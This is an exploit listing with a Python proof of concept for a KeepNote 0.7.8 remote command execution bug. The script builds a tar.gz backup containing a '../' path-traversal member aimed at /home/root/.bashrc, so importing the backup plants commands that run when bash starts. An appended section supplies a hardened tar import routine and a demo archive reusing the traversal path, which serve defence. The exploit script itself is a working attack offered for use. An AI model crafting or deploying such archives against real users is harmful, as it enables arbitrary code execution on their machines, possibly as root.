
1 new exploits
45 lines
1.6 KiB
Python
Executable file
# Title : KeepNote 0.7.8 Remote Command Execution
# Date : 29/09/2016
# Author : R-73eN
# Twitter : https://twitter.com/r_73en
# Tested on : KeepNote 0.7.8 (Kali Linux, and Windows 7)
# Software : http://keepnote.org/index.shtml#download
# Vendor : ~
#
# DESCRIPTION:
#
# When KeepNote imports a backup, which is actually a tar.gz file, it doesn't check for " ../ " characters,
# which makes it possible to do a path traversal and write anywhere in the system (where the user has write permissions).
# This simple POC will write the file test.txt to /home/root/.bashrc to get command execution when bash is run.
# There are a lot of ways but I chose this just for demonstration purposes, and it's assumed we run the KeepNote application
# as root (default in Kali Linux, where this bug was tested).
#
#

import sys
import tarfile

banner = ""
banner += " ___ __ ____ _ _ \n"
banner += " |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner += " | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner += " | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner += " |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print(banner)

if len(sys.argv) != 2:
    print("[+] Usage : python exploit.py file_to_do_the_traversal [+]")
    print("[+] Example: python exploit.py test.txt")
    sys.exit(0)

print("[+] Creating Exploit File [+]")

# Name of the archive that KeepNote will be asked to import as a backup
filename = "KeepNoteBackup.tar.gz"

# Member name inside the archive; tarfile keeps the "../" components as given
path = "../../../../../../../home/root/.bashrc"

tf = tarfile.open(filename, "w:gz")
tf.add(sys.argv[1], path)  # second positional argument of add() is arcname
tf.close()

print("[+] Created KeepNoteBackup.tar.gz successfully [+]")
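The missing check the advisory describes is the import side refusing archive members that resolve outside the destination directory. The following is an added example (not the advisory's code and not KeepNote's own import routine) of a hardened tar.gz import that vets every member, including symlink and hardlink members, before extracting anything, and of the constructed backup archives used to exercise it; `safe_import_backup`, `make_backup` and `demo` are names chosen here.

```python
import io
import os
import tarfile
import tempfile

def escapes(dest_real, path):
    """True if path, once '..' and symlinks are resolved, lies outside dest_real."""
    return os.path.commonpath([dest_real, os.path.realpath(path)]) != dest_real

def unsafe_members(tar, dest):
    """Names of members that would be written, or would link, outside dest."""
    dest_real, bad = os.path.realpath(dest), []
    for m in tar.getmembers():
        target = os.path.join(dest_real, m.name)  # '../' or absolute names resolve outside
        if escapes(dest_real, target):
            bad.append(m.name)
        elif m.issym() and escapes(dest_real, os.path.join(os.path.dirname(target), m.linkname)):
            bad.append(m.name)  # symlink member pointing out of dest
        elif m.islnk() and escapes(dest_real, os.path.join(dest_real, m.linkname)):
            bad.append(m.name)  # hardlink member to a file outside dest
    return bad

def safe_import_backup(archive_bytes, dest):
    """Vet every member before extracting anything; returns the rejected names."""
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as tar:
        bad = unsafe_members(tar, dest)
        if not bad:
            tar.extractall(dest)
    return bad

def make_backup(entries):
    """Constructed in-memory tar.gz from {arcname: bytes}; arcnames are stored as given."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for arcname, data in entries.items():
            info = tarfile.TarInfo(arcname)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()

def demo():
    """A backup carrying a '../' member is rejected whole; a clean one extracts."""
    dest = tempfile.mkdtemp()
    evil = make_backup({"notebook/index.xml": b"<notebook/>",
                        "../../../../../../../home/root/.bashrc": b"# constructed sample\n"})
    rejected = safe_import_backup(evil, dest)
    assert os.listdir(dest) == []  # nothing extracted, not even the benign member
    clean_rejected = safe_import_backup(make_backup({"notebook/index.xml": b"<notebook/>"}), dest)
    return rejected, clean_rejected, sorted(os.listdir(dest))
```

Checking all members first and extracting nothing on any rejection matters because a symlink member followed by a file member written through it would pass a per-member check done during extraction. Python 3.12 and later (and the backports to 3.8.17, 3.9.17, 3.10.12 and 3.11.4) ship `tarfile` extraction filters, and `extractall(dest, filter="data")` performs equivalent checks.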